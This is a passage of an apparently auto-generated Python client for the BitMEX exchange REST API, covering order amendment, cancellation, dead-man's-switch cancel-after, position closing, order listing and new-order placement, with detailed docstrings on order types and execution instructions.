Send an `orderID` or `origClOrdID` to identify the order you wish to amend. Both order quantity and price can be amended. Only one `qty` field can be used to amend. Use the `leavesQty` field to specify how much of the order you wish to remain open. This can be useful if you want to adjust your position's delta by a certain amount, regardless of how much of the order has already filled. > A `leavesQty` can be used to make a \"Filled\" order live again, if it is received within 60 seconds of the fill. Use the `simpleOrderQty` and `simpleLeavesQty` fields to specify order size in Bitcoin, rather than contracts. These fields will round up to the nearest contract. Like order placement, amending can be done in bulk. Simply send a request to `PUT /api/v1/order/bulk` with a JSON body of the shape: `{\"orders\": [{...}, {...}]}`, each object containing the fields used in this endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_amend(async=True)
>>> result = thread.get()
:param async bool
:param str order_id: Order ID
:param str orig_cl_ord_id: Client Order ID. See POST /order.
:param str cl_ord_id: Optional new Client Order ID, requires `origClOrdID`.
:param float simple_order_qty: Optional order quantity in units of the underlying instrument (i.e. Bitcoin).
:param float order_qty: Optional order quantity in units of the instrument (i.e. contracts).
:param float simple_leaves_qty: Optional leaves quantity in units of the underlying instrument (i.e. Bitcoin). Useful for amending partially filled orders.
:param float leaves_qty: Optional leaves quantity in units of the instrument (i.e. contracts). Useful for amending partially filled orders.
:param float price: Optional limit price for 'Limit', 'StopLimit', and 'LimitIfTouched' orders.
:param float stop_px: Optional trigger price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders. Use a price below the current price for stop-sell orders and buy-if-touched orders.
:param float peg_offset_value: Optional trailing offset from the current price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders; use a negative offset for stop-sell orders and buy-if-touched orders. Optional offset from the peg price for 'Pegged' orders.
:param str text: Optional amend annotation. e.g. 'Adjust skew'.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_amend_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_amend_with_http_info(**kwargs) # noqa: E501
return data
def order_amend_with_http_info(self, **kwargs): # noqa: E501
"""Amend the quantity or price of an open order. # noqa: E501
Send an `orderID` or `origClOrdID` to identify the order you wish to amend. Both order quantity and price can be amended. Only one `qty` field can be used to amend. Use the `leavesQty` field to specify how much of the order you wish to remain open. This can be useful if you want to adjust your position's delta by a certain amount, regardless of how much of the order has already filled. > A `leavesQty` can be used to make a \"Filled\" order live again, if it is received within 60 seconds of the fill. Use the `simpleOrderQty` and `simpleLeavesQty` fields to specify order size in Bitcoin, rather than contracts. These fields will round up to the nearest contract. Like order placement, amending can be done in bulk. Simply send a request to `PUT /api/v1/order/bulk` with a JSON body of the shape: `{\"orders\": [{...}, {...}]}`, each object containing the fields used in this endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_amend_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str order_id: Order ID
:param str orig_cl_ord_id: Client Order ID. See POST /order.
:param str cl_ord_id: Optional new Client Order ID, requires `origClOrdID`.
:param float simple_order_qty: Optional order quantity in units of the underlying instrument (i.e. Bitcoin).
:param float order_qty: Optional order quantity in units of the instrument (i.e. contracts).
:param float simple_leaves_qty: Optional leaves quantity in units of the underlying instrument (i.e. Bitcoin). Useful for amending partially filled orders.
:param float leaves_qty: Optional leaves quantity in units of the instrument (i.e. contracts). Useful for amending partially filled orders.
:param float price: Optional limit price for 'Limit', 'StopLimit', and 'LimitIfTouched' orders.
:param float stop_px: Optional trigger price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders. Use a price below the current price for stop-sell orders and buy-if-touched orders.
:param float peg_offset_value: Optional trailing offset from the current price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders; use a negative offset for stop-sell orders and buy-if-touched orders. Optional offset from the peg price for 'Pegged' orders.
:param str text: Optional amend annotation. e.g. 'Adjust skew'.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['order_id', 'orig_cl_ord_id', 'cl_ord_id', 'simple_order_qty', 'order_qty', 'simple_leaves_qty', 'leaves_qty', 'price', 'stop_px', 'peg_offset_value', 'text'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_amend" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'order_id' in params:
form_params.append(('orderID', params['order_id'])) # noqa: E501
if 'orig_cl_ord_id' in params:
form_params.append(('origClOrdID', params['orig_cl_ord_id'])) # noqa: E501
if 'cl_ord_id' in params:
form_params.append(('clOrdID', params['cl_ord_id'])) # noqa: E501
if 'simple_order_qty' in params:
form_params.append(('simpleOrderQty', params['simple_order_qty'])) # noqa: E501
if 'order_qty' in params:
form_params.append(('orderQty', params['order_qty'])) # noqa: E501
if 'simple_leaves_qty' in params:
form_params.append(('simpleLeavesQty', params['simple_leaves_qty'])) # noqa: E501
if 'leaves_qty' in params:
form_params.append(('leavesQty', params['leaves_qty'])) # noqa: E501
if 'price' in params:
form_params.append(('price', params['price'])) # noqa: E501
if 'stop_px' in params:
form_params.append(('stopPx', params['stop_px'])) # noqa: E501
if 'peg_offset_value' in params:
form_params.append(('pegOffsetValue', params['peg_offset_value'])) # noqa: E501
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_amend_bulk(self, **kwargs): # noqa: E501
"""Amend multiple orders for the same symbol. # noqa: E501
Similar to POST /amend, but with multiple orders. `application/json` only. Ratelimited at 10%. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_amend_bulk(async=True)
>>> result = thread.get()
:param async bool
:param str orders: An array of orders.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_amend_bulk_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_amend_bulk_with_http_info(**kwargs) # noqa: E501
return data
def order_amend_bulk_with_http_info(self, **kwargs): # noqa: E501
"""Amend multiple orders for the same symbol. # noqa: E501
Similar to POST /amend, but with multiple orders. `application/json` only. Ratelimited at 10%. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_amend_bulk_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str orders: An array of orders.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orders'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_amend_bulk" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'orders' in params:
form_params.append(('orders', params['orders'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/bulk', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_cancel(self, **kwargs): # noqa: E501
"""Cancel order(s). Send multiple order IDs to cancel in bulk. # noqa: E501
Either an orderID or a clOrdID must be provided. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel(async=True)
>>> result = thread.get()
:param async bool
:param str order_id: Order ID(s).
:param str cl_ord_id: Client Order ID(s). See POST /order.
:param str text: Optional cancellation annotation. e.g. 'Spread Exceeded'.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_cancel_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_cancel_with_http_info(**kwargs) # noqa: E501
return data
def order_cancel_with_http_info(self, **kwargs): # noqa: E501
"""Cancel order(s). Send multiple order IDs to cancel in bulk. # noqa: E501
Either an orderID or a clOrdID must be provided. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str order_id: Order ID(s).
:param str cl_ord_id: Client Order ID(s). See POST /order.
:param str text: Optional cancellation annotation. e.g. 'Spread Exceeded'.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['order_id', 'cl_ord_id', 'text'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_cancel" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'order_id' in params:
form_params.append(('orderID', params['order_id'])) # noqa: E501
if 'cl_ord_id' in params:
form_params.append(('clOrdID', params['cl_ord_id'])) # noqa: E501
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_cancel_all(self, **kwargs): # noqa: E501
"""Cancels all of your orders. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_all(async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Optional symbol. If provided, only cancels orders for that symbol.
:param str filter: Optional filter for cancellation. Use to only cancel some orders, e.g. `{\"side\": \"Buy\"}`.
:param str text: Optional cancellation annotation. e.g. 'Spread Exceeded'
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_cancel_all_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_cancel_all_with_http_info(**kwargs) # noqa: E501
return data
def order_cancel_all_with_http_info(self, **kwargs): # noqa: E501
"""Cancels all of your orders. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_all_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Optional symbol. If provided, only cancels orders for that symbol.
:param str filter: Optional filter for cancellation. Use to only cancel some orders, e.g. `{\"side\": \"Buy\"}`.
:param str text: Optional cancellation annotation. e.g. 'Spread Exceeded'
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['symbol', 'filter', 'text'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_cancel_all" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'symbol' in params:
form_params.append(('symbol', params['symbol'])) # noqa: E501
if 'filter' in params:
form_params.append(('filter', params['filter'])) # noqa: E501
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/all', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_cancel_all_after(self, timeout, **kwargs): # noqa: E501
"""Automatically cancel all your orders after a specified timeout. # noqa: E501
Useful as a dead-man's switch to ensure your orders are canceled in case of an outage. If called repeatedly, the existing offset will be canceled and a new one will be inserted in its place. Example usage: call this route at 15s intervals with an offset of 60000 (60s). If this route is not called within 60 seconds, all your orders will be automatically canceled. This is also available via [WebSocket](https://www.bitmex.com/app/wsAPI#Dead-Mans-Switch-Auto-Cancel). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_all_after(timeout, async=True)
>>> result = thread.get()
:param async bool
:param float timeout: Timeout in ms. Set to 0 to cancel this timer. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_cancel_all_after_with_http_info(timeout, **kwargs) # noqa: E501
else:
(data) = self.order_cancel_all_after_with_http_info(timeout, **kwargs) # noqa: E501
return data
def order_cancel_all_after_with_http_info(self, timeout, **kwargs): # noqa: E501
"""Automatically cancel all your orders after a specified timeout. # noqa: E501
Useful as a dead-man's switch to ensure your orders are canceled in case of an outage. If called repeatedly, the existing offset will be canceled and a new one will be inserted in its place. Example usage: call this route at 15s intervals with an offset of 60000 (60s). If this route is not called within 60 seconds, all your orders will be automatically canceled. This is also available via [WebSocket](https://www.bitmex.com/app/wsAPI#Dead-Mans-Switch-Auto-Cancel). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_all_after_with_http_info(timeout, async=True)
>>> result = thread.get()
:param async bool
:param float timeout: Timeout in ms. Set to 0 to cancel this timer. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['timeout'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_cancel_all_after" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'timeout' is set
if ('timeout' not in params or
params['timeout'] is None):
raise ValueError("Missing the required parameter `timeout` when calling `order_cancel_all_after`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'timeout' in params:
form_params.append(('timeout', params['timeout'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/cancelAllAfter', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_close_position(self, symbol, **kwargs): # noqa: E501
"""Close a position. [Deprecated, use POST /order with execInst: 'Close'] # noqa: E501
If no `price` is specified, a market order will be submitted to close the whole of your position. This will also close all other open orders in this symbol. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_close_position(symbol, async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Symbol of position to close. (required)
:param float price: Optional limit price.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_close_position_with_http_info(symbol, **kwargs) # noqa: E501
else:
(data) = self.order_close_position_with_http_info(symbol, **kwargs) # noqa: E501
return data
def order_close_position_with_http_info(self, symbol, **kwargs): # noqa: E501
"""Close a position. [Deprecated, use POST /order with execInst: 'Close'] # noqa: E501
If no `price` is specified, a market order will be submitted to close the whole of your position. This will also close all other open orders in this symbol. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_close_position_with_http_info(symbol, async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Symbol of position to close. (required)
:param float price: Optional limit price.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['symbol', 'price'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_close_position" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'symbol' is set
if ('symbol' not in params or
params['symbol'] is None):
raise ValueError("Missing the required parameter `symbol` when calling `order_close_position`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'symbol' in params:
form_params.append(('symbol', params['symbol'])) # noqa: E501
if 'price' in params:
form_params.append(('price', params['price'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/closePosition', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_get_orders(self, **kwargs): # noqa: E501
"""Get your orders. # noqa: E501
To get open orders only, send {\"open\": true} in the filter param. See <a href=\"http://www.onixs.biz/fix-dictionary/5.0.SP2/msgType_D_68.html\">the FIX Spec</a> for explanations of these fields. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_get_orders(async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Instrument symbol. Send a bare series (e.g. XBU) to get data for the nearest expiring contract in that series. You can also send a timeframe, e.g. `XBU:monthly`. Timeframes are `daily`, `weekly`, `monthly`, `quarterly`, and `biquarterly`.
:param str filter: Generic table filter. Send JSON key/value pairs, such as `{\"key\": \"value\"}`. You can key on individual fields, and do more advanced querying on timestamps. See the [Timestamp Docs](https://www.bitmex.com/app/restAPI#Timestamp-Filters) for more details.
:param str columns: Array of column names to fetch. If omitted, will return all columns. Note that this method will always return item keys, even when not specified, so you may receive more columns that you expect.
:param float count: Number of results to fetch.
:param float start: Starting point for results.
:param bool reverse: If true, will sort results newest first.
:param datetime start_time: Starting date filter for results.
:param datetime end_time: Ending date filter for results.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_get_orders_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_get_orders_with_http_info(**kwargs) # noqa: E501
return data
def order_get_orders_with_http_info(self, **kwargs): # noqa: E501
"""Get your orders. # noqa: E501
To get open orders only, send {\"open\": true} in the filter param. See <a href=\"http://www.onixs.biz/fix-dictionary/5.0.SP2/msgType_D_68.html\">the FIX Spec</a> for explanations of these fields. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_get_orders_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Instrument symbol. Send a bare series (e.g. XBU) to get data for the nearest expiring contract in that series. You can also send a timeframe, e.g. `XBU:monthly`. Timeframes are `daily`, `weekly`, `monthly`, `quarterly`, and `biquarterly`.
:param str filter: Generic table filter. Send JSON key/value pairs, such as `{\"key\": \"value\"}`. You can key on individual fields, and do more advanced querying on timestamps. See the [Timestamp Docs](https://www.bitmex.com/app/restAPI#Timestamp-Filters) for more details.
:param str columns: Array of column names to fetch. If omitted, will return all columns. Note that this method will always return item keys, even when not specified, so you may receive more columns that you expect.
:param float count: Number of results to fetch.
:param float start: Starting point for results.
:param bool reverse: If true, will sort results newest first.
:param datetime start_time: Starting date filter for results.
:param datetime end_time: Ending date filter for results.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['symbol', 'filter', 'columns', 'count', 'start', 'reverse', 'start_time', 'end_time'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_get_orders" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'symbol' in params:
query_params.append(('symbol', params['symbol'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'columns' in params:
query_params.append(('columns', params['columns'])) # noqa: E501
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'start' in params:
query_params.append(('start', params['start'])) # noqa: E501
if 'reverse' in params:
query_params.append(('reverse', params['reverse'])) # noqa: E501
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_new(self, symbol, **kwargs): # noqa: E501
"""Create a new order. # noqa: E501
## Placing Orders This endpoint is used for placing orders. See individual fields below for more details on their use. #### Order Types All orders require a `symbol`. All other fields are optional except when otherwise specified. These are the valid `ordType`s: * **Limit**: The default order type. Specify an `orderQty` and `price`. * **Market**: A traditional Market order. A Market order will execute until filled or your bankruptcy price is reached, at which point it will cancel. * **MarketWithLeftOverAsLimit**: A market order that, after eating through the order book as far as permitted by available margin, will become a limit order. The difference between this type and `Market` only affects the behavior in thin books. Upon reaching the deepest possible price, if there is quantity left over, a `Market` order will cancel the remaining quantity. `MarketWithLeftOverAsLimit` will keep the remaining quantity in the books as a `Limit`. * **Stop**: A Stop Market order. Specify an `orderQty` and `stopPx`. When the `stopPx` is reached, the order will be entered into the book. * On sell orders, the order will trigger if the triggering price is lower than the `stopPx`. On buys, higher. * Note: Stop orders do not consume margin until triggered. Be sure that the required margin is available in your account so that it may trigger fully. * `Close` Stops don't require an `orderQty`. See Execution Instructions below. * **StopLimit**: Like a Stop Market, but enters a Limit order instead of a Market order. Specify an `orderQty`, `stopPx`, and `price`. * **MarketIfTouched**: Similar to a Stop, but triggers are done in the opposite direction. Useful for Take Profit orders. * **LimitIfTouched**: As above; use for Take Profit Limit orders. #### Execution Instructions The following `execInst`s are supported. If using multiple, separate with a comma (e.g. `LastPrice,Close`). * **ParticipateDoNotInitiate**: Also known as a Post-Only order. If this order would have executed on placement, it will cancel instead. * **MarkPrice, LastPrice, IndexPrice**: Used by stop and if-touched orders to determine the triggering price. Use only one. By default, `'MarkPrice'` is used. Also used for Pegged orders to define the value of `'LastPeg'`. * **ReduceOnly**: A `'ReduceOnly'` order can only reduce your position, not increase it. If you have a `'ReduceOnly'` limit order that rests in the order book while the position is reduced by other orders, then its order quantity will be amended down or canceled. If there are multiple `'ReduceOnly'` orders the least aggressive will be amended first. * **Close**: `'Close'` implies `'ReduceOnly'`. A `'Close'` order will cancel other active limit orders with the same side and symbol if the open quantity exceeds the current position. This is useful for stops: by canceling these orders, a `'Close'` Stop is ensured to have the margin required to execute, and can only execute up to the full size of your position. If `orderQty` is not specified, a `'Close'` order has an `orderQty` equal to your current position's size. * Note that a `Close` order without an `orderQty` requires a `side`, so that BitMEX knows if it should trigger above or below the `stopPx`. #### Linked Orders Linked Orders are an advanced capability. It is very powerful, but its use requires careful coding and testing. Please follow this document carefully and use the [Testnet Exchange](https://testnet.bitmex.com) while developing. BitMEX offers four advanced Linked Order types: * **OCO**: *One Cancels the Other*. A very flexible version of the standard Stop / Take Profit technique. Multiple orders may be linked together using a single `clOrdLinkID`. Send a `contingencyType` of `OneCancelsTheOther` on the orders. The first order that fully or partially executes (or activates for `Stop` orders) will cancel all other orders with the same `clOrdLinkID`. * **OTO**: *One Triggers the Other*. Send a `contingencyType` of `'OneTriggersTheOther'` on the primary order and then subsequent orders with the same `clOrdLinkID` will be not be triggered until the primary order fully executes. * **OUOA**: *One Updates the Other Absolute*. Send a `contingencyType` of `'OneUpdatesTheOtherAbsolute'` on the orders. Then as one order has a execution, other orders with the same `clOrdLinkID` will have their order quantity amended down by the execution quantity. * **OUOP**: *One Updates the Other Proportional*. Send a `contingencyType` of `'OneUpdatesTheOtherProportional'` on the orders. Then as one order has a execution, other orders with the same `clOrdLinkID` will have their order quantity reduced proportionally by the fill percentage. #### Trailing Stops You may use `pegPriceType` of `'TrailingStopPeg'` to create Trailing Stops. The pegged `stopPx` will move as the market moves away from the peg, and freeze as the market moves toward it. To use, combine with `pegOffsetValue` to set the `stopPx` of your order. The peg is set to the triggering price specified in the `execInst` (default `'MarkPrice'`). Use a negative offset for stop-sell and buy-if-touched orders. Requires `ordType`: `'Stop', 'StopLimit', 'MarketIfTouched', 'LimitIfTouched'`. #### Simple Quantities Send a `simpleOrderQty` instead of an `orderQty` to create an order denominated in the underlying currency. This is useful for opening up a position with 1 XBT of exposure without having to calculate how many contracts it is. #### Rate Limits See the [Bulk Order Documentation](#!/Order/Order_newBulk) if you need to place multiple orders at the same time. Bulk orders require fewer risk checks in the trading engine and thus are ratelimited at **1/10** the normal rate. You can also improve your reactivity to market movements while staying under your ratelimit by using the [Amend](#!/Order/Order_amend) and [Amend Bulk](#!/Order/Order_amendBulk) endpoints. This allows you to stay in the market and avoids the cancel/replace cycle. #### Tracking Your Orders If you want to keep track of order IDs yourself, set a unique `clOrdID` per order. This `clOrdID` will come back as a property on the order and any related executions (including on the WebSocket), and can be used to get or cancel the order. Max length is 36 characters. You can also change the `clOrdID` by amending an order, supplying an `origClOrdID`, and your desired new ID as the `clOrdID` param, like so: ``` # Amends an order's leavesQty, and updates its clOrdID to \"def-456\" PUT /api/v1/order {\"origClOrdID\": \"abc-123\", \"clOrdID\": \"def-456\", \"leavesQty\": 1000} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_new(symbol, async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Instrument symbol. e.g. 'XBTUSD'. (required)
:param str side: Order side. Valid options: Buy, Sell. Defaults to 'Buy' unless `orderQty` or `simpleOrderQty` is negative.
